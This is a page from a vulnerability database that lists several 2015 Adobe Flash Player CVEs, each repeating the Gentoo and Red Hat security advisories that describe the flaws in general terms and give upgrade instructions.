VARIoT IoT vulnerabilities database
| VAR-201503-0382 | CVE-2015-0337 | Adobe Flash Player Vulnerabilities that bypass the same origin policy |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Adobe Flash Player before 13.0.0.277 and 14.x through 17.x before 17.0.0.134 on Windows and OS X and before 11.2.202.451 on Linux allows remote attackers to bypass the Same Origin Policy via unspecified vectors.
An attacker can exploit this issue to bypass certain same-origin policy restrictions, which may aid in further attacks. The product enables viewing of applications, content and video across screens and browsers.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process, cause a Denial of Service condition, or
bypass security restrictions.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All adobe-flash users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.451"
References
==========
[ 1 ] CVE-2015-0332
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0332
[ 2 ] CVE-2015-0333
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0333
[ 3 ] CVE-2015-0334
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0334
[ 4 ] CVE-2015-0335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0335
[ 5 ] CVE-2015-0336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0336
[ 6 ] CVE-2015-0337
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0337
[ 7 ] CVE-2015-0338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0338
[ 8 ] CVE-2015-0339
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0339
[ 9 ] CVE-2015-0340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0340
[ 10 ] CVE-2015-0341
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0341
[ 11 ] CVE-2015-0342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0342
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-09
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:0697-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0697.html
Issue date: 2015-03-17
CVE Names: CVE-2015-0332 CVE-2015-0333 CVE-2015-0334
CVE-2015-0335 CVE-2015-0336 CVE-2015-0337
CVE-2015-0338 CVE-2015-0339 CVE-2015-0340
CVE-2015-0341 CVE-2015-0342
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB15-05
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2015-0332, CVE-2015-0333, CVE-2015-0335, CVE-2015-0339,
CVE-2015-0334, CVE-2015-0336, CVE-2015-0338, CVE-2015-0341, CVE-2015-0342)
This update also fixes a cross-domain policy bypass flaw and a file upload
restriction bypass flaw.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1201636 - flash-plugin: multiple code execution issues fixed in APSB15-05
1201649 - CVE-2015-0337 flash-plugin: cross-domain policy bypass (APSB15-05)
1201651 - CVE-2015-0340 flash-plugin: file upload restriction bypass (APSB15-05)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-0332
https://access.redhat.com/security/cve/CVE-2015-0333
https://access.redhat.com/security/cve/CVE-2015-0334
https://access.redhat.com/security/cve/CVE-2015-0335
https://access.redhat.com/security/cve/CVE-2015-0336
https://access.redhat.com/security/cve/CVE-2015-0337
https://access.redhat.com/security/cve/CVE-2015-0338
https://access.redhat.com/security/cve/CVE-2015-0339
https://access.redhat.com/security/cve/CVE-2015-0340
https://access.redhat.com/security/cve/CVE-2015-0341
https://access.redhat.com/security/cve/CVE-2015-0342
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVCFmyXlSAg2UNWIIRArVvAKCjJLAKXJvnMOZ5a5IBxmKVEPZu6QCfemGc
9kdM+Q/ZOQRcHTfQ3iZRj3s=
=8M6g
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0381 | CVE-2015-0336 | Adobe Flash Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.277 and 14.x through 17.x before 17.0.0.134 on Windows and OS X and before 11.2.202.451 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2015-0334. Failed exploit attempts will likely cause a denial-of-service condition. The product enables viewing of applications, content and video across screens and browsers.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process, cause a Denial of Service condition, or
bypass security restrictions.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All adobe-flash users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.451"
References
==========
[ 1 ] CVE-2015-0332
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0332
[ 2 ] CVE-2015-0333
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0333
[ 3 ] CVE-2015-0334
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0334
[ 4 ] CVE-2015-0335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0335
[ 5 ] CVE-2015-0336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0336
[ 6 ] CVE-2015-0337
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0337
[ 7 ] CVE-2015-0338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0338
[ 8 ] CVE-2015-0339
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0339
[ 9 ] CVE-2015-0340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0340
[ 10 ] CVE-2015-0341
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0341
[ 11 ] CVE-2015-0342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0342
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-09
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:0697-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0697.html
Issue date: 2015-03-17
CVE Names: CVE-2015-0332 CVE-2015-0333 CVE-2015-0334
CVE-2015-0335 CVE-2015-0336 CVE-2015-0337
CVE-2015-0338 CVE-2015-0339 CVE-2015-0340
CVE-2015-0341 CVE-2015-0342
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB15-05
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2015-0332, CVE-2015-0333, CVE-2015-0335, CVE-2015-0339,
CVE-2015-0334, CVE-2015-0336, CVE-2015-0338, CVE-2015-0341, CVE-2015-0342)
This update also fixes a cross-domain policy bypass flaw and a file upload
restriction bypass flaw.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1201636 - flash-plugin: multiple code execution issues fixed in APSB15-05
1201649 - CVE-2015-0337 flash-plugin: cross-domain policy bypass (APSB15-05)
1201651 - CVE-2015-0340 flash-plugin: file upload restriction bypass (APSB15-05)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-0332
https://access.redhat.com/security/cve/CVE-2015-0333
https://access.redhat.com/security/cve/CVE-2015-0334
https://access.redhat.com/security/cve/CVE-2015-0335
https://access.redhat.com/security/cve/CVE-2015-0336
https://access.redhat.com/security/cve/CVE-2015-0337
https://access.redhat.com/security/cve/CVE-2015-0338
https://access.redhat.com/security/cve/CVE-2015-0339
https://access.redhat.com/security/cve/CVE-2015-0340
https://access.redhat.com/security/cve/CVE-2015-0341
https://access.redhat.com/security/cve/CVE-2015-0342
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVCFmyXlSAg2UNWIIRArVvAKCjJLAKXJvnMOZ5a5IBxmKVEPZu6QCfemGc
9kdM+Q/ZOQRcHTfQ3iZRj3s=
=8M6g
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0379 | CVE-2015-0334 | Adobe Flash Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.277 and 14.x through 17.x before 17.0.0.134 on Windows and OS X and before 11.2.202.451 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2015-0336. Failed exploit attempts will likely cause a denial-of-service condition. The product enables viewing of applications, content and video across screens and browsers.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process, cause a Denial of Service condition, or
bypass security restrictions.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All adobe-flash users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.451"
References
==========
[ 1 ] CVE-2015-0332
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0332
[ 2 ] CVE-2015-0333
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0333
[ 3 ] CVE-2015-0334
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0334
[ 4 ] CVE-2015-0335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0335
[ 5 ] CVE-2015-0336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0336
[ 6 ] CVE-2015-0337
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0337
[ 7 ] CVE-2015-0338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0338
[ 8 ] CVE-2015-0339
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0339
[ 9 ] CVE-2015-0340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0340
[ 10 ] CVE-2015-0341
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0341
[ 11 ] CVE-2015-0342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0342
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-09
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:0697-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0697.html
Issue date: 2015-03-17
CVE Names: CVE-2015-0332 CVE-2015-0333 CVE-2015-0334
CVE-2015-0335 CVE-2015-0336 CVE-2015-0337
CVE-2015-0338 CVE-2015-0339 CVE-2015-0340
CVE-2015-0341 CVE-2015-0342
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB15-05
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2015-0332, CVE-2015-0333, CVE-2015-0335, CVE-2015-0339,
CVE-2015-0334, CVE-2015-0336, CVE-2015-0338, CVE-2015-0341, CVE-2015-0342)
This update also fixes a cross-domain policy bypass flaw and a file upload
restriction bypass flaw.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1201636 - flash-plugin: multiple code execution issues fixed in APSB15-05
1201649 - CVE-2015-0337 flash-plugin: cross-domain policy bypass (APSB15-05)
1201651 - CVE-2015-0340 flash-plugin: file upload restriction bypass (APSB15-05)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-0332
https://access.redhat.com/security/cve/CVE-2015-0333
https://access.redhat.com/security/cve/CVE-2015-0334
https://access.redhat.com/security/cve/CVE-2015-0335
https://access.redhat.com/security/cve/CVE-2015-0336
https://access.redhat.com/security/cve/CVE-2015-0337
https://access.redhat.com/security/cve/CVE-2015-0338
https://access.redhat.com/security/cve/CVE-2015-0339
https://access.redhat.com/security/cve/CVE-2015-0340
https://access.redhat.com/security/cve/CVE-2015-0341
https://access.redhat.com/security/cve/CVE-2015-0342
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVCFmyXlSAg2UNWIIRArVvAKCjJLAKXJvnMOZ5a5IBxmKVEPZu6QCfemGc
9kdM+Q/ZOQRcHTfQ3iZRj3s=
=8M6g
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0383 | CVE-2015-0338 | Adobe Flash Player Integer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Integer overflow in Adobe Flash Player before 13.0.0.277 and 14.x through 17.x before 17.0.0.134 on Windows and OS X and before 11.2.202.451 on Linux allows attackers to execute arbitrary code via unspecified vectors. Adobe Flash Player Contains an integer overflow vulnerability. Supplementary information : CWE Vulnerability type by CWE-190: Integer Overflow or Wraparound ( Integer overflow or wraparound ) Has been identified. http://cwe.mitre.org/data/definitions/190.htmlAn attacker could execute arbitrary code. Failed exploit attempts will likely cause a denial-of-service condition. The product enables viewing of applications, content and video across screens and browsers.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process, cause a Denial of Service condition, or
bypass security restrictions.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All adobe-flash users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.451"
References
==========
[ 1 ] CVE-2015-0332
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0332
[ 2 ] CVE-2015-0333
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0333
[ 3 ] CVE-2015-0334
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0334
[ 4 ] CVE-2015-0335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0335
[ 5 ] CVE-2015-0336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0336
[ 6 ] CVE-2015-0337
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0337
[ 7 ] CVE-2015-0338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0338
[ 8 ] CVE-2015-0339
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0339
[ 9 ] CVE-2015-0340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0340
[ 10 ] CVE-2015-0341
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0341
[ 11 ] CVE-2015-0342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0342
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-09
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:0697-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0697.html
Issue date: 2015-03-17
CVE Names: CVE-2015-0332 CVE-2015-0333 CVE-2015-0334
CVE-2015-0335 CVE-2015-0336 CVE-2015-0337
CVE-2015-0338 CVE-2015-0339 CVE-2015-0340
CVE-2015-0341 CVE-2015-0342
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB15-05
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2015-0332, CVE-2015-0333, CVE-2015-0335, CVE-2015-0339,
CVE-2015-0334, CVE-2015-0336, CVE-2015-0338, CVE-2015-0341, CVE-2015-0342)
This update also fixes a cross-domain policy bypass flaw and a file upload
restriction bypass flaw.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1201636 - flash-plugin: multiple code execution issues fixed in APSB15-05
1201649 - CVE-2015-0337 flash-plugin: cross-domain policy bypass (APSB15-05)
1201651 - CVE-2015-0340 flash-plugin: file upload restriction bypass (APSB15-05)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-0332
https://access.redhat.com/security/cve/CVE-2015-0333
https://access.redhat.com/security/cve/CVE-2015-0334
https://access.redhat.com/security/cve/CVE-2015-0335
https://access.redhat.com/security/cve/CVE-2015-0336
https://access.redhat.com/security/cve/CVE-2015-0337
https://access.redhat.com/security/cve/CVE-2015-0338
https://access.redhat.com/security/cve/CVE-2015-0339
https://access.redhat.com/security/cve/CVE-2015-0340
https://access.redhat.com/security/cve/CVE-2015-0341
https://access.redhat.com/security/cve/CVE-2015-0342
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVCFmyXlSAg2UNWIIRArVvAKCjJLAKXJvnMOZ5a5IBxmKVEPZu6QCfemGc
9kdM+Q/ZOQRcHTfQ3iZRj3s=
=8M6g
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0380 | CVE-2015-0335 | Adobe Flash Player Vulnerabilities in arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.277 and 14.x through 17.x before 17.0.0.134 on Windows and OS X and before 11.2.202.451 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0332, CVE-2015-0333, and CVE-2015-0339.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All adobe-flash users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.451"
References
==========
[ 1 ] CVE-2015-0332
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0332
[ 2 ] CVE-2015-0333
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0333
[ 3 ] CVE-2015-0334
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0334
[ 4 ] CVE-2015-0335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0335
[ 5 ] CVE-2015-0336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0336
[ 6 ] CVE-2015-0337
